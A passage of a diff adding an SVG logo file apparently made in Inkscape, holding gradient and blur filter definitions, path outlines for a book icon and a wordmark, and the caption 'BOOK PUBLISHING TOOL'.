+         offset="0" />
+      <stop
+         id="stop3214"
+         style="stop-color:#fce94f;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3558">
+      <stop
+         id="stop3560"
+         style="stop-color:#4bc6ff;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop3562"
+         style="stop-color:#1fb7ff;stop-opacity:0"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient2652">
+      <stop
+         id="stop2654"
+         style="stop-color:#ef5d29;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop2656"
+         style="stop-color:#ef2929;stop-opacity:0"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3770">
+      <stop
+         id="stop3772"
+         style="stop-color:#999999;stop-opacity:0"
+         offset="0" />
+      <stop
+         id="stop3774"
+         style="stop-color:#cccccc;stop-opacity:1"
+         offset="0.28968501" />
+      <stop
+         id="stop3776"
+         style="stop-color:#cccccc;stop-opacity:1"
+         offset="0.72421253" />
+      <stop
+         id="stop3778"
+         style="stop-color:#999999;stop-opacity:0"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       id="linearGradient3578">
+      <stop
+         id="stop3580"
+         style="stop-color:#999999;stop-opacity:1"
+         offset="0" />
+      <stop
+         id="stop3582"
+         style="stop-color:#ffffff;stop-opacity:1"
+         offset="1" />
+    </linearGradient>
+    <linearGradient
+       x1="292.98209"
+       y1="248.94519"
+       x2="292.71686"
+       y2="254.84595"
+       id="linearGradient3605"
+       xlink:href="#linearGradient3578"
+       gradientUnits="userSpaceOnUse" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3607"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4079.057)" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3609"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4082.0622)" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3611"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4085.0674)" />
+    <linearGradient
+       x1="579.61249"
+       y1="-2053.46"
+       x2="633.25787"
+       y2="-2073.55"
+       id="linearGradient3613"
+       xlink:href="#linearGradient3770"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.8697037,0.5377184,-0.05088559,2.0041935,-132.86485,4088.0726)" />
+    <radialGradient
+       cx="308.00009"
+       cy="237.60178"
+       r="13.826746"
+       fx="308.00009"
+       fy="237.60178"
+       id="radialGradient3615"
+       xlink:href="#linearGradient2652"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(-2.470026,1.2123383,-2.5289897,-1.8798194,1652.7116,307.88628)" />
+    <radialGradient
+       cx="313.97348"
+       cy="257.40872"
+       r="4.0046649"
+       fx="313.97348"
+       fy="257.40872"
+       id="radialGradient3617"
+       xlink:href="#linearGradient3558"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(-1.2239386,0.8005673,-1.1669368,-1.1126277,983.68752,289.08822)" />
+    <linearGradient
+       x1="121.62237"
+       y1="166.88406"
+       x2="121.62236"
+       y2="63.590191"
+       id="linearGradient3216"
+       xlink:href="#linearGradient3210"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="matrix(0.9919329,0,0,0.9919329,-57.187787,-52.294514)" />
+    <linearGradient
+       x1="282.13562"
+       y1="198.85522"
+       x2="282.13562"
+       y2="220.4299"
+       id="linearGradient3224"
+       xlink:href="#linearGradient3218"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="translate(-58.623593,-52.746766)" />
+    <linearGradient
+       x1="282.13562"
+       y1="198.85522"
+       x2="282.13562"
+       y2="220.4299"
+       id="linearGradient6356"
+       xlink:href="#linearGradient3218"
+       gradientUnits="userSpaceOnUse"
+       gradientTransform="translate(-58.623593,-49.548418)" />
+    <filter
+       color-interpolation-filters="sRGB"
+       id="filter6426">
+      <feGaussianBlur
+         stdDeviation="1.3718847"
+         id="feGaussianBlur6428" />
+    </filter>
+    <linearGradient
+       x1="313.12421"
+       y1="234.06723"
+       x2="300.74551"
+       y2="252.48558"
+       id="linearGradient6436"
+       xlink:href="#linearGradient6430"
+       gradientUnits="userSpaceOnUse" />
+    <filter
+       x="-0.049464952"
+       y="-0.10498104"
+       width="1.0989299"
+       height="1.2099621"
+       color-interpolation-filters="sRGB"
+       id="filter6542">
+      <feGaussianBlur
+         stdDeviation="2.6872547"
+         id="feGaussianBlur6544" />
+    </filter>
+    <filter
+       color-interpolation-filters="sRGB"
+       id="filter6596">
+      <feGaussianBlur
+         stdDeviation="1.7274814"
+         id="feGaussianBlur6598" />
+    </filter>
+    <linearGradient
+       x1="180"
+       y1="163.62605"
+       x2="180"
+       y2="66.188019"
+       id="linearGradient6600"
+       xlink:href="#linearGradient3218"
+       gradientUnits="userSpaceOnUse" />
+    <filter
+       color-interpolation-filters="sRGB"
+       id="filter6626">
+      <feBlend
+         in2="BackgroundImage"
+         mode="multiply"
+         id="feBlend6628" />
+    </filter>
+  </defs>
+  <path
+     d="m 192.86534,56.061481 c -0.50361,-0.05952 -15.81743,15.539777 -22.98246,22.59399 6.39469,-2.022962 17.37512,-5.797322 18.87496,-5.619699 1.50061,0.17761 10.05669,6.287721 15.14374,9.668178 -3.44524,-8.295783 -10.53195,-26.582844 -11.03624,-26.642469 z m 63.7003,19.617933 c -0.36861,-0.209237 -30.19021,6.665429 -43.89415,9.694631 7.65259,0.542544 21.08672,1.231768 22.18456,1.854212 1.09971,0.623611 1.92541,8.064764 2.67487,12.283088 5.91959,-7.418443 19.40383,-23.62268 19.03472,-23.831931 z M 125.42293,59.592937 c -0.44655,0.1125 4.65988,18.477033 6.76635,26.856382 2.69189,-3.815347 6.93512,-10.632649 8.26418,-10.967772 1.33082,-0.335537 14.41073,2.134145 21.88974,3.381693 -11.49464,-6.001218 -36.47343,-19.382928 -36.92027,-19.270303 z m 164.80534,51.680193 c -0.0928,-0.27855 -33.04307,-4.73423 -48.04185,-6.88709 5.99277,2.90065 16.78887,7.80145 17.06501,8.63065 0.27649,0.83069 -6.98832,6.74108 -10.86175,10.18944 13.01804,-3.70914 41.93138,-11.65403 41.83859,-11.933 z M 125.48113,90.005528 C 110.30347,88.587271 77.076206,85.20923 76.857612,85.45104 c -0.218602,0.241871 23.348278,14.363657 33.917068,20.87246 -2.03696,-4.14784 -6.10707,-11.394242 -5.45553,-12.114888 0.65021,-0.719302 13.13762,-2.842685 20.16198,-4.203084 z m 121.66254,38.409332 c 2.03703,4.14807 6.10691,11.39426 5.45552,12.11488 -0.65033,0.7193 -13.13757,2.84269 -20.1619,4.20306 15.17775,1.41825 48.40491,4.79631 48.62348,4.5545 0.21866,-0.24186 -23.3483,-14.36365 -33.9171,-20.87244 z M 107.57689,111.87714 c -13.017795,3.70908 -41.931322,11.654 -41.838422,11.93314 0.09271,0.27847 33.043041,4.73405 48.041762,6.88692 -5.9926,-2.90067 -16.788896,-7.80154 -17.064854,-8.63067 -0.276569,-0.83079 6.988304,-6.74109 10.861514,-10.18939 z M 225.72916,148.289 c -2.69194,3.81535 -6.93504,10.63266 -8.26422,10.9678 -1.33087,0.33555 -14.41072,-2.13415 -21.88976,-3.38169 11.49463,6.00121 36.47352,19.38299 36.92049,19.27028 0.44622,-0.11245 -4.66012,-18.477 -6.76651,-26.85639 z M 118.43579,135.57189 c -5.91956,7.41845 -19.403773,23.62269 -19.034599,23.83193 0.36839,0.20917 30.190049,-6.66543 43.894159,-9.69464 -7.65284,-0.54256 -21.08673,-1.23178 -22.1848,-1.85426 -1.09959,-0.62357 -1.92533,-8.06468 -2.67476,-12.28303 z m 67.64804,20.85589 c -6.39469,2.02298 -17.37508,5.79732 -18.87493,5.61969 -1.50044,-0.17764 -10.05685,-6.28769 -15.14375,-9.66826 3.44522,8.29578 10.53209,26.58297 11.03633,26.64251 0.50342,0.0594 15.81741,-15.53967 22.98235,-22.59394 z"
+     transform="matrix(1,0,0,1.0406634,-58.623593,-54.026411)"
+     id="path6546"
+     style="opacity:0.35096154;fill:url(#linearGradient6600);fill-opacity:1;filter:url(#filter6596)" />
+  <path
+     d="m 134.24175,3.3147155 c -0.50361,-0.05952 -15.81743,15.5397765 -22.98246,22.5939895 6.39469,-2.022962 17.37512,-5.797322 18.87496,-5.619699 1.50061,0.17761 10.05669,6.287721 15.14374,9.668178 C 141.83275,21.661401 134.74604,3.3743405 134.24175,3.3147155 z m 63.7003,19.6179325 c -0.36861,-0.209237 -30.19021,6.665429 -43.89415,9.694631 7.65259,0.542544 21.08672,1.231768 22.18456,1.854212 1.09971,0.623611 1.92541,8.064764 2.67487,12.283088 5.91959,-7.418443 19.40383,-23.62268 19.03472,-23.831931 z M 66.799337,6.8461715 c -0.44655,0.1125 4.65988,18.4770325 6.76635,26.8563815 2.69189,-3.815347 6.93512,-10.632649 8.26418,-10.967772 1.33082,-0.335537 14.41073,2.134145 21.889743,3.381693 C 92.224967,20.115256 67.246177,6.7335465 66.799337,6.8461715 z M 231.60468,58.526364 c -0.0928,-0.27855 -33.04307,-4.73423 -48.04185,-6.88709 5.99277,2.90065 16.78887,7.80145 17.06501,8.63065 0.27649,0.83069 -6.98832,6.74108 -10.86175,10.18944 13.01804,-3.70914 41.93138,-11.65403 41.83859,-11.933 z M 66.857537,37.258762 c -15.17766,-1.418257 -48.404924,-4.796298 -48.623518,-4.554488 -0.218602,0.241871 23.348278,14.363657 33.917068,20.87246 -2.03696,-4.14784 -6.10707,-11.394242 -5.45553,-12.114888 0.65021,-0.719302 13.13762,-2.842685 20.16198,-4.203084 z M 188.52008,75.668094 c 2.03703,4.14807 6.10691,11.39426 5.45552,12.11488 -0.65033,0.7193 -13.13757,2.84269 -20.1619,4.20306 15.17775,1.41825 48.40491,4.79631 48.62348,4.5545 0.21866,-0.24186 -23.3483,-14.36365 -33.9171,-20.87244 z M 48.953297,59.130374 c -13.017795,3.70908 -41.9313217,11.654 -41.8384217,11.93314 0.09271,0.27847 33.0430407,4.73405 48.0417617,6.88692 -5.9926,-2.90067 -16.788896,-7.80154 -17.064854,-8.63067 -0.276569,-0.83079 6.988304,-6.74109 10.861514,-10.18939 z m 118.152273,36.41186 c -2.69194,3.81535 -6.93504,10.632656 -8.26422,10.967796 -1.33087,0.33555 -14.41072,-2.13415 -21.88976,-3.38169 11.49463,6.00121 36.47352,19.38299 36.92049,19.27028 0.44622,-0.11245 -4.66012,-18.477 -6.76651,-26.856386 z M 59.812197,82.825124 c -5.91956,7.41845 -19.403773,23.622686 -19.034599,23.831926 0.36839,0.20917 30.190049,-6.665426 43.894159,-9.694636 -7.65284,-0.54256 -21.08673,-1.23178 -22.1848,-1.85426 -1.09959,-0.62357 -1.92533,-8.06468 -2.67476,-12.28303 z m 67.648043,20.855886 c -6.39469,2.02298 -17.37508,5.79732 -18.87493,5.61969 -1.50044,-0.17764 -10.056853,-6.28769 -15.143753,-9.668256 3.44522,8.295776 10.532093,26.582966 11.036333,26.642506 0.50342,0.0594 15.81741,-15.53967 22.98235,-22.59394 z"
+     id="path3766"
+     style="fill:url(#linearGradient3216);fill-opacity:1" />
+  <g
+     transform="matrix(1.2433595,-0.05648069,-0.00851864,1.1425318,-114.05679,-272.08226)"
+     id="g3512"
+     style="enable-background:new">
+    <g
+       transform="matrix(0.7599177,-0.01192692,0,0.7500728,246.58115,378.18196)"
+       id="g3514">
+      <g
+         transform="matrix(2.8294915,-0.5196682,1.922722,2.7658074,-1390.7458,-622.14861)"
+         id="g3516">
+        <path
+           d="m 191.25,92.09375 c -0.20592,0.0097 -0.4015,0.01903 -0.59375,0.0625 L 129.21875,107.4375 114.875,97.78125 114.75,111.625 c -0.0268,3.59859 -0.0786,5.26638 1.90625,6.5625 l 50.3125,34.09375 c 0.1414,0.11519 0.2923,0.21282 0.4375,0.3125 0.30609,0.21013 0.63149,0.39638 0.96875,0.53125 0.0608,0.0243 0.12527,0.0408 0.1875,0.0625 0.85167,0.32374 1.78133,0.42664 2.5625,0.25 l 72.53125,-16.5 c 0.76901,-0.17389 1.24307,-0.58588 1.40625,-1.125 0.16316,-0.53911 0.0189,-1.22272 -0.5,-1.875 l -49.25,-40.03125 c -0.51896,-0.652313 -1.31584,-1.187828 -2.15625,-1.5 -0.63032,-0.23411 -1.28848,-0.341522 -1.90625,-0.3125 z"
+           transform="matrix(0.3165905,0.08474257,-0.2518713,0.3747611,270.47662,187.97058)"
+           id="path5539"
+           style="opacity:0.5;fill:#000000;fill-opacity:1;filter:url(#filter6542)" />
+        <path
+           d="m 281.53626,237.15326 27.51166,-0.60706 c 0.28726,0 0.54652,0.1161 0.73397,0.3043 0.18744,0.18821 0.30307,0.44853 0.30307,0.73697 l 5.50607,19.18448 c 0,0.28843 -0.11563,0.54874 -0.30307,0.73695 -0.18745,0.18821 -0.44671,0.30432 -0.73397,0.30432 l -27.12774,0.0421 c -0.57451,0 -1.03703,-0.46441 -1.03703,-1.04127 l -5.88999,-18.61951 c 0,-0.57687 0.46252,-1.04127 1.03703,-1.04127 z"
+           id="path3518"
+           style="fill:#8d0000;fill-opacity:1" />
+        <path
+           d="m 293.04884,250.57475 24.09263,-0.46052 c -2.06778,1.70244 -3.74217,4.07456 -3.72168,6.23725 l -24.60495,0.081 c -2.80034,-0.14106 1.92301,-6.21234 4.234,-5.85776 z"
+           id="path3520"
+           style="fill:url(#linearGradient3605);fill-opacity:1" />
+        <g
+           transform="matrix(0.4446532,0.0482263,-0.1333755,0.1962764,116.26445,175.89592)"
+           id="g3522">
+          <path
+             d="m 473.62579,276.25731 49.99465,-12.3175"
+             id="path3524"
+             style="fill:none;stroke:url(#linearGradient3607);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+          <path
+             d="M 473.62579,279.2625 523.62044,266.945"
+             id="path3526"
+             style="fill:none;stroke:url(#linearGradient3609);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+          <path
+             d="m 473.62579,282.26769 49.99465,-12.3175"
+             id="path3528"
+             style="fill:none;stroke:url(#linearGradient3611);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+          <path
+             d="m 473.62579,285.27287 49.99465,-12.3175"
+             id="path3530"
+             style="fill:none;stroke:url(#linearGradient3613);stroke-width:0.731525;stroke-linecap:butt;stroke-linejoin:miter;stroke-miterlimit:4;stroke-opacity:1;stroke-dasharray:none" />
+        </g>
+        <path
+           d="m 297.97117,252.53831 c 3.55435,7.23743 1.84248,10.21442 1.84248,10.21442 2.34309,-1.31419 3.98813,-2.90075 4.59366,-4.89297 1.69632,2.05733 3.28001,4.14745 6.61694,5.72721 0,0 -2.85323,-6.91061 -4.0263,-10.8615 l -9.02678,-0.18716 z"
+           id="path3532"
+           style="fill:#0093d9;fill-opacity:1;stroke-width:2" />
+        <path
+           d="m 284.57789,231.78049 26.77592,0.20008 c 0.68561,0 1.23756,0.55195 1.23756,1.23755 l 7.06718,15.78748 c 0,0.6856 -0.55195,1.23755 -1.23756,1.23755 l -27.04539,-0.34183 -8.03527,-16.88328 c 0,-0.6856 0.55195,-1.23755 1.23756,-1.23755 z"
+           id="path3534"
+           style="fill:url(#linearGradient6436);fill-opacity:1" />
+        <path
+           d="m 280.11847,237.40712 3.52338,-5.17553 7.74436,17.75537 c -3.36741,1.31622 -7.06065,7.43359 -3.57281,7.85099 -0.90727,0.0228 -1.25561,-0.2564 -1.40216,-0.76942 l -7.33593,-17.04682 c -0.30195,-0.65394 0.12828,-1.26825 1.04316,-2.61459 z"
+           id="path3536"
+           style="fill:#bc0000;fill-opacity:1" />
+        <path
+           d="m 284.81403,231.70142 25.95424,-0.0282 c 0.46998,0 0.84832,0.37836 0.84832,0.84833 0.22453,6.59441 -14.1341,15.47802 -20.88485,16.08864 l -6.76604,-16.0604 c 0,-0.46997 0.37835,-0.84833 0.84833,-0.84833 z"
+           id="path3538"
+           style="fill:url(#radialGradient3615);fill-opacity:1" />
+        <path
+           d="m 300.57764,261.77315 c 2.52506,-1.48438 3.39499,-3.74367 3.94533,-5.4168 0.129,2.75802 6.15463,7.38876 5.50424,5.77641 -2.09513,-5.19394 -2.45794,-8.70017 -3.21244,-8.8903 -1.09621,-0.27623 -6.29411,-0.14168 -7.77351,-0.22359 1.0853,2.18428 1.8036,4.4636 1.53638,8.75428 z"
+           id="path3540"
+           style="opacity:0.79901961;fill:url(#radialGradient3617);fill-opacity:1;stroke-width:2" />
+        <path
+           d="m 319.47279,249.25686 c 0,0.6856 -0.36012,0.98755 -1.04573,0.98755 l -26.46288,0.44824 -0.60592,-0.84306 c 7.14032,-0.21334 18.76088,-0.20836 28.11453,-0.59273 z"
+           id="path3542"
+           style="fill:#a70000;fill-opacity:1" />
+      </g>
+    </g>
+  </g>
+  <path
+     d="m 14.400303,150.8796 3.34996,0 c 2.70348,0 5.3482,-0.23509 7.52274,-0.76403 4.52538,-1.17543 9.69726,-4.34909 9.69726,-11.69549 0,-4.46662 -1.93945,-7.52274 -4.58416,-9.16833 -2.82102,-1.76314 -6.58239,-2.35086 -10.69638,-2.35086 l -16.3971997,0 0,1.70437 c 5.17187,0.35263 5.28942,0.47018 5.28942,3.76137 l 0,30.4454 c 0,3.29119 -0.11755,3.40874 -5.28942,3.76137 l 0,1.70437 17.3375397,0 0,-1.70437 c -6.05344,-0.35263 -6.22976,-0.47018 -6.22976,-3.76137 l 0,-11.93243 m 0,-19.74717 c 0,-1.6456 0.64649,-2.17454 4.46662,-2.17454 6.05344,0 9.75604,3.46752 9.75604,9.87358 0,7.34641 -4.81925,9.99113 -9.87358,9.99113 -3.46751,0 -4.34908,-0.11754 -4.34908,-2.29208 l 0,-15.39809 m 58.765624,36.43823 0,-1.70437 c -4.05522,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,13.22355 c 0,1.6456 -0.17631,2.93857 -0.47017,3.52628 -1.35174,2.70348 -4.17276,4.40785 -7.22887,4.40785 -3.40874,0 -5.93591,-2.11577 -5.93591,-6.69993 l 0,-19.98225 -0.4114,-0.35263 -9.227094,1.46928 0,1.46928 2.233314,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,15.51563 c 0,6.7587 3.99645,8.8157 8.34553,8.8157 4.99556,0 9.05079,-3.40874 10.75515,-4.23153 l 0.58772,3.52628 9.40341,0 m 9.15435,0.70525 2.35085,-2.29208 c 2.05699,1.17543 4.5254,2.29208 8.93324,2.29208 7.816583,0 14.634063,-3.76138 14.634063,-15.75072 0,-3.64381 -0.76403,-14.45774 -11.342863,-14.45774 -4.46662,0 -7.93414,2.87979 -10.10867,4.17276 l 0,-17.92525 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.23509 c 1.52805,0.17631 1.88068,0.47017 1.88068,2.70348 l 0,37.96628 1.05789,0.47017 m 4.46662,-19.57085 c 0,-1.46928 0.11754,-2.40963 0.58771,-3.34997 1.41051,-2.82102 3.87891,-4.11399 7.1701,-4.11399 2.40962,0 7.581513,1.41052 7.581513,11.63672 0,8.63938 -2.644723,13.3411 -8.463083,13.3411 -3.11487,0 -5.40696,-1.58683 -6.46484,-4.5254 -0.35263,-1.05788 -0.4114,-2.29208 -0.4114,-3.70259 l 0,-9.28587 m 37.375603,-24.3901 -0.4114,-0.35263 -9.22709,1.46928 0,1.46928 2.2333,0.23509 c 1.52806,0.17631 1.88069,0.47017 1.88069,2.70348 l 0,32.61809 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.3402,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-38.14259 m 9.43811,15.22177 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17277,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.41141,-0.35263 -9.22709,1.46928 m 6.81747,-13.98758 c -2.11576,0 -3.58505,1.52806 -3.58505,3.64383 0,2.05699 1.46929,3.52628 3.58505,3.52628 2.17454,0 3.52628,-1.46929 3.58505,-3.52628 0,-2.11577 -1.41051,-3.64383 -3.58505,-3.64383 m 27.69946,39.67065 c -6.99378,0 -8.63939,-7.28765 -8.63939,-12.81215 0,-8.75692 3.46752,-12.28321 7.52274,-12.28321 2.70347,0 4.40785,1.93946 5.58327,5.11311 0.35263,0.94034 0.70526,1.52805 1.82191,1.52805 1.17543,0 3.46751,-0.76403 3.46751,-2.99733 0,-2.70348 -3.87891,-5.70082 -10.22621,-5.70082 -10.69637,0 -14.28143,7.58151 -14.28143,15.39809 0,9.8148 4.81925,14.81037 13.63495,14.81037 4.11398,0 9.6385,-2.17454 11.28409,-8.46307 l -1.70437,-0.8228 c -1.82191,4.11399 -4.17277,6.22976 -8.46307,6.22976 m 33.63996,-6.05344 c 0,4.76047 -3.64382,5.99467 -5.9359,5.99467 -3.64382,0 -5.40697,-2.58594 -5.40697,-6.05345 0,-2.76225 1.29298,-4.17276 4.58417,-5.40696 2.35085,-0.88157 5.46573,-1.99822 6.7587,-2.82102 l 0,8.28676 m 5.28942,-13.28233 c 0,-3.40873 -0.76404,-7.81658 -9.6385,-7.81658 -6.64115,0 -11.87181,3.46751 -11.87181,6.69993 0,1.88068 2.17454,2.76225 3.2912,2.76225 1.23419,0 1.58682,-0.64648 1.88068,-1.6456 1.29297,-4.34907 3.7026,-5.75959 6.05345,-5.75959 2.29208,0 4.99556,1.17544 4.99556,5.87714 l 0,2.46839 c -1.46928,1.52806 -7.17011,2.99734 -11.81304,4.46662 -4.23153,1.29297 -5.46573,4.23154 -5.46573,6.99379 0,4.40785 2.93857,8.34553 8.46307,8.34553 3.64382,-0.11754 6.87625,-2.29208 8.75693,-3.52628 0.8228,2.17454 1.76314,3.52628 3.82014,3.52628 2.17453,0 4.7017,-0.64648 6.93501,-1.76314 l -0.35262,-1.41051 c -0.8228,0.17631 -2.11577,0.29386 -2.99734,0.0588 -1.05789,-0.23508 -2.057,-1.35174 -2.057,-5.05433 l 0,-14.22267 m 38.36187,1.52806 c 0,-5.9359 -3.23243,-9.34464 -8.63939,-9.34464 -4.34907,0 -7.05256,2.11577 -10.69638,4.46662 l -0.8228,-4.46662 -8.75693,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17631,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-13.75249 c 0,-1.46928 0.11754,-2.29208 0.58771,-3.23243 1.2342,-2.29207 3.87891,-4.23153 6.99379,-4.23153 3.99645,0 6.17099,2.23331 6.17099,7.34642 l 0,13.87003 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-15.04546"
+     id="text2427"
+     style="font-size:58.77133179px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;line-height:125%;writing-mode:lr-tb;text-anchor:start;fill:url(#linearGradient3224);fill-opacity:1;stroke:none;font-family:Utopia;-inkscape-font-specification:Utopia" />
+  <text
+     x="213.01947"
+     y="195.03021"
+     id="text2432"
+     xml:space="preserve"
+     style="font-size:13.46161938px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:end;line-height:125%;writing-mode:lr-tb;text-anchor:end;fill:#888a85;fill-opacity:1;stroke:none;font-family:Liberation Sans;-inkscape-font-specification:Liberation Sans"><tspan
+       x="213.01947"
+       y="195.03021"
+       id="tspan2434"
+       style="font-size:13.46161938px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:end;line-height:125%;letter-spacing:0.44818318;writing-mode:lr-tb;text-anchor:end;fill:#888a85;font-family:Liberation Sans;-inkscape-font-specification:Liberation Sans">BOOK PUBLISHING TOOL</tspan></text>
+  <path
+     d="m 14.400303,154.07795 3.34996,0 c 2.70348,0 5.3482,-0.23509 7.52274,-0.76403 4.52538,-1.17543 9.69726,-4.34909 9.69726,-11.69549 0,-4.46662 -1.93945,-7.52274 -4.58416,-9.16833 -2.82102,-1.76314 -6.58239,-2.35086 -10.69638,-2.35086 l -16.3971997,0 0,1.70437 c 5.17187,0.35263 5.28942,0.47018 5.28942,3.76137 l 0,30.4454 c 0,3.29119 -0.11755,3.40874 -5.28942,3.76137 l 0,1.70437 17.3375397,0 0,-1.70437 c -6.05344,-0.35263 -6.22976,-0.47018 -6.22976,-3.76137 l 0,-11.93243 m 0,-19.74717 c 0,-1.6456 0.64649,-2.17454 4.46662,-2.17454 6.05344,0 9.75604,3.46752 9.75604,9.87358 0,7.34641 -4.81925,9.99113 -9.87358,9.99113 -3.46751,0 -4.34908,-0.11754 -4.34908,-2.29208 l 0,-15.39809 m 58.765624,36.43823 0,-1.70437 c -4.05522,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,13.22355 c 0,1.6456 -0.17631,2.93857 -0.47017,3.52628 -1.35174,2.70348 -4.17276,4.40785 -7.22887,4.40785 -3.40874,0 -5.93591,-2.11577 -5.93591,-6.69993 l 0,-19.98225 -0.4114,-0.35263 -9.227094,1.46928 0,1.46928 2.233314,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,15.51563 c 0,6.7587 3.99645,8.8157 8.34553,8.8157 4.99556,0 9.05079,-3.40874 10.75515,-4.23153 l 0.58772,3.52628 9.40341,0 m 9.15435,0.70525 2.35085,-2.29208 c 2.05699,1.17543 4.5254,2.29208 8.93324,2.29208 7.816583,0 14.634063,-3.76138 14.634063,-15.75072 0,-3.64381 -0.76403,-14.45774 -11.342863,-14.45774 -4.46662,0 -7.93414,2.87979 -10.10867,4.17276 l 0,-17.92525 -0.4114,-0.35263 -9.2271,1.46928 0,1.46928 2.23331,0.23509 c 1.52805,0.17631 1.88068,0.47017 1.88068,2.70348 l 0,37.96628 1.05789,0.47017 m 4.46662,-19.57085 c 0,-1.46928 0.11754,-2.40963 0.58771,-3.34997 1.41051,-2.82102 3.87891,-4.11399 7.1701,-4.11399 2.40962,0 7.581513,1.41052 7.581513,11.63672 0,8.63938 -2.644723,13.3411 -8.463083,13.3411 -3.11487,0 -5.40696,-1.58683 -6.46484,-4.5254 -0.35263,-1.05788 -0.4114,-2.29208 -0.4114,-3.70259 l 0,-9.28587 m 37.375603,-24.3901 -0.4114,-0.35263 -9.22709,1.46928 0,1.46928 2.2333,0.23509 c 1.52806,0.17631 1.88069,0.47017 1.88069,2.70348 l 0,32.61809 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.3402,0 0,-1.70437 c -4.17276,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-38.14259 m 9.43811,15.22177 0,1.46928 2.23331,0.29386 c 1.52805,0.23509 1.88068,0.52894 1.88068,2.64471 l 0,18.51297 c 0,2.99733 -0.17632,3.11488 -4.40785,3.40874 l 0,1.70437 14.34021,0 0,-1.70437 c -4.17277,-0.29386 -4.40785,-0.41141 -4.40785,-3.40874 l 0,-24.03747 -0.41141,-0.35263 -9.22709,1.46928 m 6.81747,-13.98758 c -2.11576,0 -3.58505,1.52806 -3.58505,3.64383 0,2.05699 1.46929,3.52628 3.58505,3.52628 2.17454,0 3.52628,-1.46929 3.58505,-3.52628 0,-2.11577 -1.41051,-3.64383 -3.58505,-3.64383 m 27.69946,39.67065 c -6.99378,0 -8.63939,-7.28765 -8.63939,-12.81215 0,-8.75692 3.46752,-12.28321 7.52274,-12.28321 2.70347,0 4.40785,1.93946 5.58327,5.11311 0.35263,0.94034 0.70526,1.52805 1.82191,1.52805 1.17543,0 3.46751,-0.76403 3.46751,-2.99733 0,-2.70348 -3.87891,-5.70082 -10.22621,-5.70082 -10.69637,0 -14.28143,7.58151 -14.28143,15.39809 0,9.8148 4.81925,14.81037 13.63495,14.81037 4.11398,0 9.6385,-2.17454 11.28409,-8.46307 l -1.70437,-0.8228 c -1.82191,4.11399 -4.17277,6.22976 -8.46307,6.22976 m 33.63996,-6.05344 c 0,4.76047 -3.64382,5.99467 -5.9359,5.99467 -3.64382,0 -5.40697,-2.58594 -5.40697,-6.05345 0,-2.76225 1.29298,-4.17276 4.58417,-5.40696 2.35085,-0.88157 5.46573,-1.99822 6.7587,-2.82102 l 0,8.28676 m 5.28942,-13.28233 c 0,-3.40873 -0.76404,-7.81658 -9.6385,-7.81658 -6.64115,0 -11.87181,3.46751 -11.87181,6.69993 